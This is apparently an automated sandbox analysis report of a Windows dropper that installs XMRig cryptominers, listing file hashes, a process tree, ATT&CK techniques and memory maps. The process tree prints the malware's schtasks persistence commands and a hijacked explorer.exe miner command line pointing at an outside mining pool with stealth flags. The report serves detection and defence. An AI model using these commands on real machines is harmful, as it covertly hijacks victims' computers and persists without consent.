Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    19-07-2021 21:36

General

  • Target

    mixazed_20210719-222908.exe

  • Size

    3.2MB

  • MD5

    379b06514e47a54d8a7ce19bd82e16bf

  • SHA1

    a43d359cb07311c9bafd99e8d26501d1c76e4e4f

  • SHA256

    de5d543be8cd62ef0b23cfba8d9e6bd867be8d642099bd7eea4cef872b91d46d

  • SHA512

    c5c943cb027e60ebbde20cfc9bae6b2fd74de18dfaf30cf406ce4bacad209d1c8fe02286bf45ca481cfb3301a0eb2578d5b62458380154c776a49915f2146847

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\mixazed_20210719-222908.exe
    "C:\Users\Admin\AppData\Local\Temp\mixazed_20210719-222908.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1984
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:320
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1216
      • C:\Users\Admin\appdata\local\temp\services64.exe
        "C:\Users\Admin\appdata\local\temp\services64.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1172
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1948
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1136
        • C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
          "C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
          4⤵
          • Executes dropped EXE
          PID:1832
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=stratum+tcp://xmr.viabtc.com:8888 --user=Slicem --pass= --cpu-max-threads-hint=20 --cinit-idle-wait=1 --cinit-idle-cpu=40 --cinit-stealth
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1216
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1248
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1284
      • C:\Users\Admin\appdata\local\temp\services32.exe
        "C:\Users\Admin\appdata\local\temp\services32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1356
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1104
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1740
        • C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
          "C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
          4⤵
          • Executes dropped EXE
          PID:1984

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Install Root Certificate

1
T1130

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
    MD5

    d915eb706a9ad54f27c85a84e2a75704

    SHA1

    5c50e7e131c9d20ef07d0427d1d2f1046c185855

    SHA256

    58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

    SHA512

    46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe
    MD5

    846b9e20fc1ea8d299069866bf46ed41

    SHA1

    3dc878e63880e506be67f0dbd9b531da7b21e1cb

    SHA256

    c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

    SHA512

    3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

  • C:\Users\Admin\AppData\Local\Temp\services32.exe
    MD5

    846b9e20fc1ea8d299069866bf46ed41

    SHA1

    3dc878e63880e506be67f0dbd9b531da7b21e1cb

    SHA256

    c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

    SHA512

    3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

  • C:\Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    d915eb706a9ad54f27c85a84e2a75704

    SHA1

    5c50e7e131c9d20ef07d0427d1d2f1046c185855

    SHA256

    58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

    SHA512

    46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

  • C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
    MD5

    a891eeeb9726b351e7b8774a0711b01d

    SHA1

    6cfc9f8b0aca2645b4dfc0913fdf4013b29532dd

    SHA256

    41254f4ef060944b40cb73dc4883cff3ba321006cdf605cc058a7baf1cb704c6

    SHA512

    600e4475cbf675b2295a8540d61fd91b416d8f2d965f098aaa11855b7210a401a5b7942c298f213f544b2c82cc4c82d9130607affe92ebc52032267ababb01c3

  • C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
    MD5

    767b138625feab1d12a2a5ca186fe2a0

    SHA1

    129f88e5a21e167adbc8c156aa25f8514de82bfc

    SHA256

    97be56392d3b36d92901eea57a18cffca2d8b1df459e6c5600e74755348bd04b

    SHA512

    d0dec5337c649f131d2ef53f8798998efeda87b56be709234990072cb706ea3a1f27d2e556a6d667182371303a944f4d849fd7de58af8be670b62d75ff112947

  • C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
    MD5

    a891eeeb9726b351e7b8774a0711b01d

    SHA1

    6cfc9f8b0aca2645b4dfc0913fdf4013b29532dd

    SHA256

    41254f4ef060944b40cb73dc4883cff3ba321006cdf605cc058a7baf1cb704c6

    SHA512

    600e4475cbf675b2295a8540d61fd91b416d8f2d965f098aaa11855b7210a401a5b7942c298f213f544b2c82cc4c82d9130607affe92ebc52032267ababb01c3

  • C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
    MD5

    767b138625feab1d12a2a5ca186fe2a0

    SHA1

    129f88e5a21e167adbc8c156aa25f8514de82bfc

    SHA256

    97be56392d3b36d92901eea57a18cffca2d8b1df459e6c5600e74755348bd04b

    SHA512

    d0dec5337c649f131d2ef53f8798998efeda87b56be709234990072cb706ea3a1f27d2e556a6d667182371303a944f4d849fd7de58af8be670b62d75ff112947

  • \??\c:\users\admin\appdata\local\temp\rarsfx0\1.exe
    MD5

    d915eb706a9ad54f27c85a84e2a75704

    SHA1

    5c50e7e131c9d20ef07d0427d1d2f1046c185855

    SHA256

    58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

    SHA512

    46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

  • \??\c:\users\admin\appdata\local\temp\rarsfx0\2.exe
    MD5

    846b9e20fc1ea8d299069866bf46ed41

    SHA1

    3dc878e63880e506be67f0dbd9b531da7b21e1cb

    SHA256

    c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

    SHA512

    3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

  • \??\c:\users\admin\appdata\local\temp\services32.exe
    MD5

    846b9e20fc1ea8d299069866bf46ed41

    SHA1

    3dc878e63880e506be67f0dbd9b531da7b21e1cb

    SHA256

    c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

    SHA512

    3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

  • \??\c:\users\admin\appdata\local\temp\services64.exe
    MD5

    d915eb706a9ad54f27c85a84e2a75704

    SHA1

    5c50e7e131c9d20ef07d0427d1d2f1046c185855

    SHA256

    58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

    SHA512

    46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

  • \Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
    MD5

    d915eb706a9ad54f27c85a84e2a75704

    SHA1

    5c50e7e131c9d20ef07d0427d1d2f1046c185855

    SHA256

    58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

    SHA512

    46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

  • \Users\Admin\AppData\Local\Temp\RarSFX0\2.exe
    MD5

    846b9e20fc1ea8d299069866bf46ed41

    SHA1

    3dc878e63880e506be67f0dbd9b531da7b21e1cb

    SHA256

    c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

    SHA512

    3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

  • \Users\Admin\AppData\Local\Temp\services32.exe
    MD5

    846b9e20fc1ea8d299069866bf46ed41

    SHA1

    3dc878e63880e506be67f0dbd9b531da7b21e1cb

    SHA256

    c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

    SHA512

    3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

  • \Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    d915eb706a9ad54f27c85a84e2a75704

    SHA1

    5c50e7e131c9d20ef07d0427d1d2f1046c185855

    SHA256

    58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

    SHA512

    46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

  • \Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
    MD5

    a891eeeb9726b351e7b8774a0711b01d

    SHA1

    6cfc9f8b0aca2645b4dfc0913fdf4013b29532dd

    SHA256

    41254f4ef060944b40cb73dc4883cff3ba321006cdf605cc058a7baf1cb704c6

    SHA512

    600e4475cbf675b2295a8540d61fd91b416d8f2d965f098aaa11855b7210a401a5b7942c298f213f544b2c82cc4c82d9130607affe92ebc52032267ababb01c3

  • \Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
    MD5

    767b138625feab1d12a2a5ca186fe2a0

    SHA1

    129f88e5a21e167adbc8c156aa25f8514de82bfc

    SHA256

    97be56392d3b36d92901eea57a18cffca2d8b1df459e6c5600e74755348bd04b

    SHA512

    d0dec5337c649f131d2ef53f8798998efeda87b56be709234990072cb706ea3a1f27d2e556a6d667182371303a944f4d849fd7de58af8be670b62d75ff112947

  • memory/320-96-0x0000000000000000-mapping.dmp
  • memory/436-104-0x0000000000000000-mapping.dmp
  • memory/436-166-0x0000000077650000-0x0000000077660000-memory.dmp
    Filesize

    64KB

  • memory/436-181-0x000000001C880000-0x000000001C882000-memory.dmp
    Filesize

    8KB

  • memory/1104-218-0x0000000000000000-mapping.dmp
  • memory/1136-169-0x0000000000000000-mapping.dmp
  • memory/1172-165-0x0000000077650000-0x0000000077660000-memory.dmp
    Filesize

    64KB

  • memory/1172-179-0x000000001C680000-0x000000001C682000-memory.dmp
    Filesize

    8KB

  • memory/1172-100-0x0000000000000000-mapping.dmp
  • memory/1216-219-0x00000001402EB66C-mapping.dmp
  • memory/1216-229-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/1216-231-0x0000000000140000-0x0000000000160000-memory.dmp
    Filesize

    128KB

  • memory/1216-97-0x0000000000000000-mapping.dmp
  • memory/1248-177-0x0000000000000000-mapping.dmp
  • memory/1284-178-0x0000000000000000-mapping.dmp
  • memory/1356-228-0x0000000002D20000-0x0000000002D22000-memory.dmp
    Filesize

    8KB

  • memory/1356-215-0x0000000077650000-0x0000000077660000-memory.dmp
    Filesize

    64KB

  • memory/1356-183-0x0000000000000000-mapping.dmp
  • memory/1740-227-0x0000000000000000-mapping.dmp
  • memory/1756-60-0x0000000075FE1000-0x0000000075FE3000-memory.dmp
    Filesize

    8KB

  • memory/1832-180-0x000000001BB90000-0x000000001BB92000-memory.dmp
    Filesize

    8KB

  • memory/1832-171-0x0000000000000000-mapping.dmp
  • memory/1948-168-0x0000000000000000-mapping.dmp
  • memory/1984-76-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-73-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-84-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-83-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-82-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-81-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-86-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-80-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-79-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-87-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-78-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-77-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-95-0x0000000000680000-0x0000000000689000-memory.dmp
    Filesize

    36KB

  • memory/1984-88-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-89-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-75-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-74-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-85-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-90-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-72-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-71-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-98-0x000000001C5B0000-0x000000001C5B2000-memory.dmp
    Filesize

    8KB

  • memory/1984-70-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-68-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-69-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-67-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-66-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-221-0x0000000000000000-mapping.dmp
  • memory/1984-92-0x000000013F3C0000-0x000000013F3C1000-memory.dmp
    Filesize

    4KB

  • memory/1984-94-0x0000000077650000-0x0000000077660000-memory.dmp
    Filesize

    64KB

  • memory/1984-65-0x0000000077420000-0x0000000077430000-memory.dmp
    Filesize

    64KB

  • memory/1984-230-0x000000001B620000-0x000000001B622000-memory.dmp
    Filesize

    8KB

  • memory/1984-62-0x0000000000000000-mapping.dmp